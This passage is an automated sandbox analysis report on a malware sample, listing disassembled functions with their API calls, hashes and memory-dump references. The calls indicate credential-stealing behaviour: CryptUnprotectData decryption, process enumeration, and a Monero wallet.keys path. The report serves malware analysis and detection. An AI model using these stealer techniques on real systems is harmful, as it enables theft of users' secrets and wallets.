                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: &_?$43x$J#3l$WU]$Yrf;$n6d9
                                  • API String ID: 0-2176626836
                                  • Opcode ID: 1a74a3f00fd2473d58d661e847db8f3b5f003666a3e1440885d360bcf8198596
                                  • Instruction ID: f935caa9ca3a85e566179f3b39bbfdaf2e6f03312d86487354e524ee7754c546
                                  • Opcode Fuzzy Hash: 1a74a3f00fd2473d58d661e847db8f3b5f003666a3e1440885d360bcf8198596
                                  • Instruction Fuzzy Hash: 89A2F7F3A0C214AFE304AE2DEC8567ABBE9EF94720F1A453DE6C4C7744E63558018697
                                  Function 00E49009 Relevance: 7.8, Strings: 5, Instructions: 1598COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: o?_$'K;$:b[O$WHmu$uMmm
                                  • API String ID: 0-3036676330
                                  • Opcode ID: 4a5f904b740d255d3b0abd1842105bf1a1da71c02a7cfdaaaf2c55b7e63a3239
                                  • Instruction ID: adcfcc5adbb576c5983e4f343e00739a4ff27e32c715b65f8e866f13311bc14a
                                  • Opcode Fuzzy Hash: 4a5f904b740d255d3b0abd1842105bf1a1da71c02a7cfdaaaf2c55b7e63a3239
                                  • Instruction Fuzzy Hash: 20B214F360C204AFE3046E2DEC8567ABBE9EF94720F1A493DE6C4C3744E63599058697
                                  Function 00A7C820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00A7C871
                                  • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00A7C87C
                                  • lstrcat.KERNEL32(?,00A90B46), ref: 00A7C943
                                  • lstrcat.KERNEL32(?,00A90B47), ref: 00A7C957
                                  • lstrcat.KERNEL32(?,00A90B4E), ref: 00A7C978
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$BinaryCryptStringlstrlen
                                  • String ID:
                                  • API String ID: 189259977-0
                                  • Opcode ID: f3509c5bd254974bf69704946079b01a4a48ba9f35d93c21097a832a526f0600
                                  • Instruction ID: af49d1a038a4fb2e596c4fadd26fda9020b3664ee28d226ca7088bdb4e79d22b
                                  • Opcode Fuzzy Hash: f3509c5bd254974bf69704946079b01a4a48ba9f35d93c21097a832a526f0600
                                  • Instruction Fuzzy Hash: A94143B590421AEFDB10DF94DD89BEEB7B8BB44744F1046A8F609A6280D7705A84CF91
                                  Function 00A77240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00A7724D
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00A77254
                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00A77281
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00A772A4
                                  • LocalFree.KERNEL32(?), ref: 00A772AE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                  • String ID:
                                  • API String ID: 2609814428-0
                                  • Opcode ID: 1ae4ef0ce62a2409f50d7ee2ae4aa9027867f327671d86104af7bc5cf0dd802c
                                  • Instruction ID: ef3b896feec6b49d6f6785e03a0f74bc156bbbc01651e73c04d59c88de43f45f
                                  • Opcode Fuzzy Hash: 1ae4ef0ce62a2409f50d7ee2ae4aa9027867f327671d86104af7bc5cf0dd802c
                                  • Instruction Fuzzy Hash: 4B012575B40208BBEB10DFD4CD45F9D77B8EB44704F108154FB09BB2C0D671AA008BA5
                                  Function 00A89600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00A8961E
                                  • Process32First.KERNEL32(00A90ACA,00000128), ref: 00A89632
                                  • Process32Next.KERNEL32(00A90ACA,00000128), ref: 00A89647
                                  • StrCmpCA.SHLWAPI(?,00000000), ref: 00A8965C
                                  • CloseHandle.KERNEL32(00A90ACA), ref: 00A8967A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                  • String ID:
                                  • API String ID: 420147892-0
                                  • Opcode ID: 12e85d2f55ac59b7decaad5d340100aceda8e7e149a90059825efc82edc42cb3
                                  • Instruction ID: 34095d82ddce20af3eec337f791d5b93d134a43d426899c2f1cf15c5a026679f
                                  • Opcode Fuzzy Hash: 12e85d2f55ac59b7decaad5d340100aceda8e7e149a90059825efc82edc42cb3
                                  • Instruction Fuzzy Hash: 0B011E75A00208EBCB14DFA5DD58BEEB7F9EF48300F144298A945A7280EB359B40DF51
                                  Function 00E3D4C6 Relevance: 6.4, Strings: 4, Instructions: 1402COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: nn$oQ?}$weZ?$r#X
                                  • API String ID: 0-398326426
                                  • Opcode ID: 42fd980d89ac06f4fcbc049ed5fcbf76a982c32a6650efe964752fcc9ac5e9cd
                                  • Instruction ID: b9768f587b05e31906e0e028d042fe137756c007b23fe587ced096543cd4fc6a
                                  • Opcode Fuzzy Hash: 42fd980d89ac06f4fcbc049ed5fcbf76a982c32a6650efe964752fcc9ac5e9cd
                                  • Instruction Fuzzy Hash: 91A206F3A0C204AFE7046E29EC8577ABBE5EF94720F1A493DE6C4C3744EA3558058697
                                  Function 00A88680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00A8A740: lstrcpy.KERNEL32(00A90E17,00000000), ref: 00A8A788
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00A905B7), ref: 00A886CA
                                  • Process32First.KERNEL32(?,00000128), ref: 00A886DE
                                  • Process32Next.KERNEL32(?,00000128), ref: 00A886F3
                                    • Part of subcall function 00A8A9B0: lstrlen.KERNEL32(?,006888B8,?,\Monero\wallet.keys,00A90E17), ref: 00A8A9C5
                                    • Part of subcall function 00A8A9B0: lstrcpy.KERNEL32(00000000), ref: 00A8AA04
                                    • Part of subcall function 00A8A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A8AA12
                                    • Part of subcall function 00A8A8A0: lstrcpy.KERNEL32(?,00A90E17), ref: 00A8A905
                                  • CloseHandle.KERNEL32(?), ref: 00A88761
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                  • String ID:
                                  • API String ID: 1066202413-0
                                  • Opcode ID: e9eb856a9752f19d899e02b5d490e1fb5f216b4dd41b4c7c2e1fe5f8b5719527
                                  • Instruction ID: d8cbc614d68c348c8e0d49f3a59ccc7f39c73fa850ca37bd3d6c804bc55e0edf
                                  • Opcode Fuzzy Hash: e9eb856a9752f19d899e02b5d490e1fb5f216b4dd41b4c7c2e1fe5f8b5719527
                                  • Instruction Fuzzy Hash: 0D315971901218ABDB24EB54CD41FEEB778FF55700F5046AAE10AA21A0DF386A45CFA2
                                  Function 00A88EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CryptBinaryToStringA.CRYPT32(00000000,00A75184,40000001,00000000,00000000,?,00A75184), ref: 00A88EC0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: BinaryCryptString
                                  • String ID:
                                  • API String ID: 80407269-0
                                  • Opcode ID: 46e9c5710708a5a48646c1b077df247a361ea83c0e3ee5e96aed7b565883174d
                                  • Instruction ID: 59be46775fb655c544fa24ee6aafcc7d0bfb5f2a4129364b4d1ab9742f974809
                                  • Opcode Fuzzy Hash: 46e9c5710708a5a48646c1b077df247a361ea83c0e3ee5e96aed7b565883174d
                                  • Instruction Fuzzy Hash: 6F1127B0200208FFDB00DF64E885FAB33BAAF89304F509548FA598B250DB39EC41DB60
                                  Function 00A79AC0 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00A74EEE,00000000,00000000), ref: 00A79AEF
                                  • LocalAlloc.KERNEL32(00000040,?,?,?,00A74EEE,00000000,?), ref: 00A79B01
                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00A74EEE,00000000,00000000), ref: 00A79B2A
                                  • LocalFree.KERNEL32(?,?,?,?,00A74EEE,00000000,?), ref: 00A79B3F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: BinaryCryptLocalString$AllocFree
                                  • String ID:
                                  • API String ID: 4291131564-0
                                  • Opcode ID: 3b30cc002a489a05e8c6c4427ed26779d626b9fc60520c09f3676cb8e71eef66
                                  • Instruction ID: ea4dd22bd1b0711dd73d1dbb9a9ba4e5021828fbd649b5c5093d110fefe6deb8
                                  • Opcode Fuzzy Hash: 3b30cc002a489a05e8c6c4427ed26779d626b9fc60520c09f3676cb8e71eef66
                                  • Instruction Fuzzy Hash: F01190B4640208AFEB10CF64DC95FAA77B5EB89700F20C159F9199B3D0C7B6A901CB90
                                  Function 00A87980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00A90E00,00000000,?), ref: 00A879B0
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00A879B7
                                  • GetLocalTime.KERNEL32(?,?,?,?,?,00A90E00,00000000,?), ref: 00A879C4
                                  • wsprintfA.USER32 ref: 00A879F3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateLocalProcessTimewsprintf
                                  • String ID:
                                  • API String ID: 377395780-0
                                  • Opcode ID: 638cc00a0596df5f8eb7657244097bd8d813257726a7ec18561c3bc4bb8287bc
                                  • Instruction ID: af42f748655df757633c0ee207f26329a54643714e5ac3abbdeab40415336d4a
                                  • Opcode Fuzzy Hash: 638cc00a0596df5f8eb7657244097bd8d813257726a7ec18561c3bc4bb8287bc
                                  • Instruction Fuzzy Hash: FB1123B2904118ABCB14DFCADD45BBEBBF8FB4CB11F10421AF645A2280E2395940CBB1
                                  Function 00A87A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0068EE98,00000000,?,00A90E10,00000000,?,00000000,00000000), ref: 00A87A63
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00A87A6A
                                  • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0068EE98,00000000,?,00A90E10,00000000,?,00000000,00000000,?), ref: 00A87A7D
                                  • wsprintfA.USER32 ref: 00A87AB7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                  • String ID:
                                  • API String ID: 3317088062-0
                                  • Opcode ID: 320ebf5ea254176750d3810189edb6d9e99949d71064cfc80754d9df61ca0abd
                                  • Instruction ID: b5e84384d97b9eb2bc76fcb1199048c2ce29f3069796083c52e72acaec6e3de4
                                  • Opcode Fuzzy Hash: 320ebf5ea254176750d3810189edb6d9e99949d71064cfc80754d9df61ca0abd
                                  • Instruction Fuzzy Hash: 0B118EB1A45218EBEB209B54DC49FADB7B8FB04761F10479AE91AA32C0D7745E40CF91
